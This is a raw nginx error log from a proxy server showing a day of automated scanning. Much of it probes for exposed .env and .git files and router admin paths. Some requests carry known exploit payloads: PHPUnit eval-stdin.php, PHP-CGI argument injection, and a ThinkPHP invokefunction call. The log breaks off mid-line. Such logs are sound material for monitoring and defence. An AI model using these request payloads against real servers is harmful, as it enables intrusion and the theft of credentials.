"http://91.82.215.191/" +2026/01/31 09:51:39 [error] 258#258: *18156 open() "/var/www/html/SQlite/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /SQlite/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/31 09:51:39 [error] 258#258: *18157 open() "/var/www/html/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/31 09:51:39 [error] 258#258: *18158 open() "/var/www/html/test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/31 09:51:39 [error] 258#258: *18159 open() "/var/www/html/SQLiteManager-1.2.4/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /SQLiteManager-1.2.4/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/31 09:51:39 [error] 258#258: *18160 open() "/var/www/html/agSearch/SQlite/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /agSearch/SQlite/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/31 09:53:57 [error] 258#258: *18162 "/var/www/html/.git/refs/heads/index.html" is not found (2: No such file or directory), client: 185.241.208.170, server: localhost-nginx-proxy-manager, request: "GET /.git/refs/heads/ HTTP/1.1", host: "91.82.215.191" +2026/01/31 10:01:52 [error] 259#259: *18205 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 10:30:39 [error] 254#254: *283 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 10:30:55 [error] 256#256: *287 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 10:43:16 [error] 253#253: *333 "/var/www/html/bins/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bins/ HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 11:20:48 [error] 253#253: *444 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 12:13:21 [error] 254#254: *560 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 91.224.92.115, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 12:15:54 [error] 254#254: *573 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 13:03:30 [error] 256#256: *783 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 13:21:06 [error] 256#256: *797 open() "/var/www/html/aaa9" failed (2: No such file or directory), client: 80.82.77.202, server: localhost-nginx-proxy-manager, request: "GET /aaa9 HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 13:21:06 [error] 256#256: *799 open() "/var/www/html/aab9" failed (2: No such file or directory), client: 80.82.77.202, server: localhost-nginx-proxy-manager, request: "GET /aab9 HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 13:55:12 [error] 255#255: *841 open() "/var/www/html/.env" failed (2: No such file or directory), client: 185.241.208.170, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.215.191" +2026/01/31 13:55:27 [error] 255#255: *842 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 15:09:58 [error] 255#255: *913 open() "/var/www/html/goform/formJsonAjaxReq" failed (2: No such file or directory), client: 176.65.139.8, server: localhost-nginx-proxy-manager, request: "POST /goform/formJsonAjaxReq HTTP/1.1", host: "78.131.122.113", referrer: "http://78.131.122.113/home.asp" +2026/01/31 15:13:25 [error] 255#255: *2733 open() "/var/www/html/.vercel/project.json" failed (2: No such file or directory), client: 216.81.248.135, server: localhost-nginx-proxy-manager, request: "GET /.vercel/project.json HTTP/1.1", host: "78.131.122.113" +2026/01/31 15:13:25 [error] 255#255: *2734 open() "/var/www/html/.env.backup9" failed (2: No such file or directory), client: 216.81.248.135, server: localhost-nginx-proxy-manager, request: "GET /.env.backup9 HTTP/1.1", host: "78.131.122.113" +2026/01/31 15:13:25 [error] 255#255: *2735 open() "/var/www/html/config/.env.production" failed (2: No such file or directory), client: 216.81.248.135, server: localhost-nginx-proxy-manager, request: "GET /config/.env.production HTTP/1.1", host: "78.131.122.113" +2026/01/31 16:25:02 [error] 262#262: *4277 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 101.198.0.188, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/31 16:25:04 [error] 262#262: *4278 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 101.198.0.140, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/31 16:25:06 [error] 262#262: *4280 open() "/var/www/html/config.json" failed (2: No such file or directory), client: 101.198.0.170, server: localhost-nginx-proxy-manager, request: "GET /config.json HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/31 16:53:11 [error] 263#263: *4289 open() "/var/www/html/ncsi.txt" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET http://www.msftncsi.com/ncsi.txt HTTP/1.1", host: "www.msftncsi.com", referrer: "http://78.131.122.113/" +2026/01/31 16:53:11 [error] 263#263: *4290 "/var/www/html/HNAP1/index.html" is not found (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /HNAP1/ HTTP/1.1", host: "78.131.122.113", referrer: "http://78.131.122.113/" +2026/01/31 16:53:11 [error] 263#263: *4291 open() "/var/www/html/sqlite/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /sqlite/main.php HTTP/1.1", host: "78.131.122.113", referrer: "http://78.131.122.113/" +2026/01/31 16:53:11 [error] 263#263: *4292 open() "/var/www/html/sqlitemanager/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /sqlitemanager/main.php HTTP/1.1", host: "78.131.122.113", referrer: "http://78.131.122.113/" +2026/01/31 16:53:11 [error] 263#263: *4293 open() "/var/www/html/SQLiteManager/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /SQLiteManager/main.php HTTP/1.1", host: "78.131.122.113", referrer: "http://78.131.122.113/" +2026/01/31 16:53:11 [error] 263#263: *4294 open() "/var/www/html/SQLite/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /SQLite/main.php HTTP/1.1", host: "78.131.122.113", referrer: "http://78.131.122.113/" +2026/01/31 16:53:11 [error] 263#263: *4295 open() "/var/www/html/SQlite/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /SQlite/main.php HTTP/1.1", host: "78.131.122.113", referrer: "http://78.131.122.113/" +2026/01/31 16:53:11 [error] 263#263: *4296 open() "/var/www/html/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /main.php HTTP/1.1", host: "78.131.122.113", referrer: "http://78.131.122.113/" +2026/01/31 16:53:11 [error] 263#263: *4297 open() "/var/www/html/test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php HTTP/1.1", host: "78.131.122.113", referrer: "http://78.131.122.113/" +2026/01/31 16:53:11 [error] 263#263: *4298 open() "/var/www/html/SQLiteManager-1.2.4/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /SQLiteManager-1.2.4/main.php HTTP/1.1", host: "78.131.122.113", referrer: "http://78.131.122.113/" +2026/01/31 16:53:11 [error] 263#263: *4299 open() "/var/www/html/agSearch/SQlite/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /agSearch/SQlite/main.php HTTP/1.1", host: "78.131.122.113", referrer: "http://78.131.122.113/" +2026/01/31 16:53:22 [error] 263#263: *4300 open() "/var/www/html/portal/redlion" failed (2: No such file or directory), client: 20.65.193.198, server: localhost-nginx-proxy-manager, request: "GET /portal/redlion HTTP/1.1", host: "78.131.122.113" +2026/01/31 18:44:33 [error] 261#261: *4366 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:44:37 [error] 261#261: *4366 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:44:39 [error] 261#261: *4366 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:44:42 [error] 261#261: *4366 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:44:44 [error] 261#261: *4366 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:44:46 [error] 261#261: *4366 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:44:49 [error] 261#261: *4366 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:44:51 [error] 261#261: *4366 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:44:54 [error] 261#261: *4366 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:44:56 [error] 261#261: *4366 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:44:59 [error] 261#261: *4366 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:45:02 [error] 261#261: *4366 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:45:05 [error] 261#261: *4366 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:45:08 [error] 261#261: *4366 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:45:10 [error] 261#261: *4366 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:45:12 [error] 261#261: *4366 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:45:15 [error] 261#261: *4366 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:45:17 [error] 261#261: *4366 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:45:20 [error] 261#261: *4366 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:45:22 [error] 261#261: *4366 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:45:25 [error] 261#261: *4366 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:45:27 [error] 261#261: *4366 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:45:29 [error] 261#261: *4366 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:45:31 [error] 261#261: *4366 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:45:34 [error] 261#261: *4366 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:45:35 [error] 261#261: *4366 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:45:37 [error] 261#261: *4366 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:45:39 [error] 261#261: *4366 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:45:41 [error] 261#261: *4366 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:45:43 [error] 261#261: *4366 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:45:45 [error] 261#261: *4366 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:45:48 [error] 261#261: *4366 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:45:51 [error] 261#261: *4366 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:45:53 [error] 261#261: *4366 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:45:56 [error] 261#261: *4366 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:45:59 [error] 261#261: *4366 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:46:01 [error] 261#261: *4366 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:46:03 [error] 261#261: *4366 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:46:05 [error] 261#261: *4366 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:46:08 [error] 261#261: *4366 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 18:46:15 [error] 261#261: *4366 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 182.137.117.153, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 19:17:39 [error] 261#261: *4432 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 19:58:06 [error] 262#262: *4466 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:04:36 [error] 262#262: *4484 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:36:29 [error] 263#263: *4492 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 172.213.25.189, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "78-131-122-113.pool.digikabel.hu" +2026/01/31 21:36:29 [error] 263#263: *4492 open() "/var/www/html/rip.php" failed (2: No such file or directory), client: 172.213.25.189, server: localhost-nginx-proxy-manager, request: "GET /rip.php HTTP/1.1", host: "78-131-122-113.pool.digikabel.hu" +2026/01/31 21:59:15 [error] 263#263: *4507 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:17 [error] 263#263: *4507 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:18 [error] 263#263: *4507 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:19 [error] 263#263: *4507 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:20 [error] 263#263: *4507 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:21 [error] 263#263: *4507 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:22 [error] 263#263: *4507 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:23 [error] 263#263: *4507 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:24 [error] 263#263: *4507 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:24 [error] 263#263: *4507 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:25 [error] 263#263: *4507 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:26 [error] 263#263: *4507 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:26 [error] 263#263: *4507 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:27 [error] 263#263: *4507 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:28 [error] 263#263: *4507 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:28 [error] 263#263: *4507 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:29 [error] 263#263: *4507 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET 